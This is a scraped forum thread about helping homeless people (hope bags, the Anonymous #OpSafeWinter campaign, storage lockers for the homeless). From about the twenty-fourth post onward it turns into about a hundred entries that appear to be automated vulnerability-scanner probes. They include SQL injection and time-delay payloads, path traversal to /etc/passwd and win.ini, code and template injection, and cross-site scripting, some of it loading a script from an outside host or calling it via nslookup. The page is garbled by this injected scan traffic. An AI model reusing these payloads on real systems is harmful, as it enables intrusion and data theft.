Customize

Helping homeless.

Discussion in 'Projects' started by AnoMM, Nov 30, 2015.

1. AnoMM Member

I have been buying sweaters, waters, granola bars, fruit, chips, and have been making PB&J and putting them in a bag that I give to homeless people. I can give you instructions on exactly how to make your own hope bags if you are interested.
    • Like Like x 4
  2. Disambiguation Global Moderator

Yes please do. Thank you for your work for people who need help.
    • Like Like x 3
  3. Kilia Member

Thank you, would love to have the instructions.
    • Like Like x 1
  4. furball Member

Nice! You don't know how happy it makes me to see actions like this and Operation Safe Winter. I usually stop and chat for a while and maybe buy coffee or a sandwich, but I could certainly do more as I think about it.

Can you post those instruction here so the people who are interested can quickly jump straight in?
    • Like Like x 2
  5. Anon De Plume Member

Anonymous #OPSafeWinter Re-Engaged 2015-2016

Fellow Anon and Citizens of the world, We are proud to re-announce #OPSafeWinter. In this age of consumerism there is very little love or care about each other and we are here to change that. No longer shall we stand by and watch isolation and fear be spread by the establishment, which is killing and destroying community and lives. We all have a voice, so make yours heard, you are the power, your choice, your life, you are the motivation for justice.

OP mission is to highlight the homeless situation in areas throughout world. Build up a resource network for food supply, blankets, clothes, socks etc. that can be donated.

Amenities for warm showers, warm food, warm places to sleep and the like.

1st Mission: Please list the current homeless count in alphabetical order by town/City Country
    Within each town contact local charities, shops, businesses that will support with any of the above list and more.
    You can get the latest figures from your local council by sending them a freedom of information request if you are not sure of the figures in your town.

2nd Mission: Coordinate with anons and others willing to participate in the execution/distribution of services we are able to provide. Whether it's transport, collection of donations etc.
    This is not definitive, any other suggestions and ideas are welcome. Please list at the bottom of the pad as bullet points to make it easy to follow.

Lets make winter as safe and comfortable as possible for as many people within our reach and beyond.

Please share this OP with as many people as possible

Work together online or RL, everyone can help no matter how small or big the activity.

@OpSafeWinter #OpSafeWinter

https://opsafewinter.net/

https://www.facebook.com/anonymousopsafewinter
    • Like Like x 3
  6. DeathHamster Member

Okay, lockers for the homeless seems like a sensible notion.

What was at the root of Mountain View's policy? Did they one day decide that they didn't want homeless using them, or did they find that some people were abusing them by cramming lockers with a shopping cart load of junk, including rotting food?

What kind of policy should they have (no food, junk limits, 5 minutes locker time, etc), and how much money/time would it require? If you can present them with a working plan to build on, that's a good first step. You might even be able to get input on the proposal, off the record, from the people who would end up running it, especially about costs.

Once you have a plan and ballpark costs, then you have something you can drop on a social activist politician. (And it might not be a lefty politician if you have a solid workable plan.)

Some kind of post box system to given them a fixed mailing address could be good too.

And for Anomm:
    http://www.cbc.ca/news/canada/nova-scotia/coat-collection-homeless-giving-1.3321587
    (Cute, but I don't think that's the best way to distribute clothing.)
  7. ideafarm Member

I keep thinking of problems with bike lockers, including the fact that there will be abuse, rotting food, etc. (Backpedaling) The most enabling thing that you can do for a homeless person is to subsidize public transit. Give him/her a monthly bus pass in return for minimal participation in case management at the local shelter. With a bus pass, and possibly a subsidy for renting a small storage locker, you can transform a hopeless and miserable situation into one where the person feels empowered to take other actions to make his/her life better.

The secure storage of belongings needs to be addressed. It doesn't do any good to give a homeless person equipment or clothing that will be lost or stolen or just abandoned within a few days. When you have to take everything that you own with you wherever you go, you can't manage to have very much. For example, the person will typically be wearing all of the clothing that he/she owns. Violent theft is a problem. I met a man just a month ago who had his face kicked in during the night; the attacker bashed in his face and stole his backpack, sleeping bag, and jacket.
    • Like Like x 1
  8. furball Member

• Like Like x 2
  9. Dallasanon Member

You sound as if you are homeless by choice not by circumstance. You have internet access which you use to post insane ramblings in a style much like a manifesto from a lone wolf who's name I care not to mention. I never said that we were giving anyone money and furthermore food sleeping bags and compassionate human contact is far from useless shit.

As a former junkie and homeless wanderer myself your advice is not needed. I've been in recovery for the better part of the last decade now and my eyes see the human that has lost his way not a blight.
    Please sir take your misogynist view and hide away from those of us with "a plan"
    • Like Like x 6
  10. Dallasanon Member

Pl
    Please share, and thank you!
    • Like Like x 1
  11. White Tara Global Moderator

Do not bother trying to make rational discourse with people who lack a mind open enough to accept other peoples perspectives. JS
    TL/DR for those who pay close attention: Brainstorm is as Brainstorm does
    • Like Like x 3
  12. Dallasanon Member

Not to worry tara.
    • Like Like x 2
  13. Dallasanon Member

20151204_140456.jpg 20151204_134456.jpg 20151204_134409.jpg
    This is where I spent my day yesterday, although we found nobody "home"
    • Like Like x 2
  14. Disambiguation Global Moderator

• Like Like x 1
  15. Disambiguation Global Moderator

• Like Like x 1
  16. ideafarm Member

(Forwardpedalling) In my dreams, city councils "zone in" homelessness by proactively soliciting businesses catering to the needs of homelessness. A wide downtown sidewalk could accommodate a hundred "stuff shelters", designed to accommodate homeless peoples' stuff while making it impossible to sleep within them. Many homeless people have significant monthly income from the government and would be able to pay market rents for such storage. Those who do not could be subsidized. Much of the misery on the streets is caused by the voting population wanting to "zone out" homelessness.
  17. Dallasanon Member

FB_IMG_1450637690419.jpg
    From north Texas with love.
    • Like Like x 6
  18. Disambiguation Global Moderator

• Like Like x 2
  19. A.O.T.F Member

aoswuk.jpg

Published on Feb 3, 2016
    Short documentary for Operation Safe Winter and Anonymous looking at the ongoing issue of homelessness today in the UK.

Please visit the #OpSafeWinter and #OpGroundZer0 pages and show your support!

https:// youtu.be/2IMikiFMYoA

Excellent people! Excellent cause .... Bravo Anonymous UK!
  20. A.O.T.F Member

21. thesneakster Member

Speaking as a person who had been homeless and camping in a small tent at night on a street in downtown Los Angeles from April 21st 2015 up until Jan 11th, 2016 (when I was taken to LA County / USC Medical Center ER with a very severe cellulitis in both lower legs after collapsing in the street), I wish to applaud the efforts of those posting on this thread to help homeless persons wherever they may be. I reckon such good works are worth lots of extra Good Kharma points, for those who believe in such things.

Great job, all!

Michael A. Hobson
    Independent Scientologist
    email: warrior_mike2001@yahoo.com
    Facebook: https://www.facebook.com/mhobson2011
  22. Stay safe.
  23. Disambiguation Global Moderator

The new PC for the homeless “our street dependent neighbors”
    I kid you not
  24. response.write(9656082*9019453)
  25. '+response.write(9656082*9019453)+'
  26. "+response.write(9656082*9019453)+"
  27. response.write(9553112*9507154)
  28. '+response.write(9553112*9507154)+'
  29. "+response.write(9553112*9507154)+"
  30. response.write(9683267*9625639)
  31. '+response.write(9683267*9625639)+'
  32. "+response.write(9683267*9625639)+"
  33. 20</script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\/s?u=013541&r=3-33049&h=3-45d22-2&/).slice(2),document.documentElement.appendChild(s))//'>
  34. -1 OR 2+928-928-1=0+0+0+1 --
  35. ../../../../../../../../../../etc/passwd
  36. ../../../../../../../../../../../../../../../proc/version
  37. 20;copy (select '') to program 'nslookup dns.sqli.\013541.3-33077.3.45d22.\1.bxss.me'
  38. ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
  39. 20';copy (select '') to program 'nslookup dns.sqli.\013541.3-33079.3.45d22.\1.bxss.me
  40. ../../../../../../../../../../etc/passwd.jpg
  41. ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
  42. /../..//../..//../..//../..//../..//etc/passwd.jpg
  43. .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
  44. /etc/passwd
  45. -1 OR 2+405-405-1=0+0+0+1 --
  46. %2fetc%2fpasswd
  47. /.././.././.././.././.././.././.././../etc/./passwd%00
  48. ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
  49. -1 OR 2+530-530-1=0+0+0+1
  50. ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
  51. -1' OR 2+989-989-1=0+0+0+1 --
  52. -1' OR 2+491-491-1=0+0+0+1 or 'S2ZVaeTA'='
  53. -1" OR 2+437-437-1=0+0+0+1 --
  54. if(now()=sysdate(),sleep(4),0)/*'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()=sysdate(),sleep(4),0))OR"*/
  55. invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
  56. ../../../../../../../../../../etc/passwd.jpg
  57. ${9999436+9999015}
  58. /../..//../..//../..//../..//../..//etc/passwd.jpg
  59. -1 OR 2+135-135-1=0+0+0+1 --
  60. ${9999915+9999266}
  61. ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
  62. ${10000306+9999588}
  63. -1 OR 2+112-112-1=0+0+0+1
  64. .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
  65. 1some_inexistent_file_with_long_name.jpg
  66. -1' OR 2+739-739-1=0+0+0+1 --
  67. -1' OR 2+22-22-1=0+0+0+1 or '8tclI8uP'='
  68. /etc/passwd
  69. -1" OR 2+789-789-1=0+0+0+1 --
  70. %2fetc%2fpasswd
  71. if(now()=sysdate(),sleep(5),0)/*'XOR(if(now()=sysdate(),sleep(5),0))OR'"XOR(if(now()=sysdate(),sleep(5),0))OR"*/
  72. testasp.vulnweb.com
  73. /.././.././.././.././.././.././.././../etc/./passwd%00
  74. ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
  75. (select(0)from(select(sleep(5)))v)/*'+(select(0)from(select(sleep(5)))v)+'"+(select(0)from(select(sleep(5)))v)+"*/
  76. -1; waitfor delay '0:0:5' --
  77. ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
  78. -1); waitfor delay '0:0:10' --
  79. ................windowswin.ini
  80. ..\..\..\..\..\..\..\..\windows\win.ini
  81. !(()&&!|*|*|
  82. /.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
  83. ^(#$!@#$)(()))******
  84. ;print(md5(acunetix_wvs_security_test));
  85. ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
  86. ';print(md5(acunetix_wvs_security_test));$a='
  87. !(()&&!|*|*|
  88. ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
  89. ";print(md5(acunetix_wvs_security_test));$a="
  90. ^(#$!@#$)(()))******
  91. unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
  92. ${@print(md5(acunetix_wvs_security_test))}
  93. WEB-INF/web.xml
  94. ${@print(md5(acunetix_wvs_security_test))}\
  95. WEB-INF\web.xml
  96. ;print(md5(acunetix_wvs_security_test));
  97. ../../../../../../../../../../etc/passwd
  98. ';print(md5(acunetix_wvs_security_test));$a='
  99. ../../../../../../../../../../../../../../../proc/version
  100. ";print(md5(acunetix_wvs_security_test));$a="
  101. ${@print(md5(acunetix_wvs_security_test))}
  102. ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
  103. ${@print(md5(acunetix_wvs_security_test))}\
  104. ../../../../../../../../../../etc/passwd.jpg
  105. C:\WINDOWS\system32\drivers\etc\hosts
  106. add-reply/.
  107. ../../../../../../../../../../windows/win.ini.jpg
  108. ................windowswin.ini
  109. ..\..\..\..\..\..\..\..\windows\win.ini
  110. /.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
  111. ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
  112. )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
  113. ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
  114. )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
  115. unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
  116. WEB-INF/web.xml
  117. )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
  118. WEB-INF\web.xml
  119. 20'"()&%<acx><ScRiPt >dNH9(9225)</ScRiPt>
  120. '"()&%<acx><ScRiPt >dNH9(9757)</ScRiPt>
  121. 20<ScRiPt >dNH9(9595)</ScRiPt>
  122. 20<WFO8PR>VDOP3[!+!]</WFO8PR>
  123. 20<script>dNH9(9249)</script>
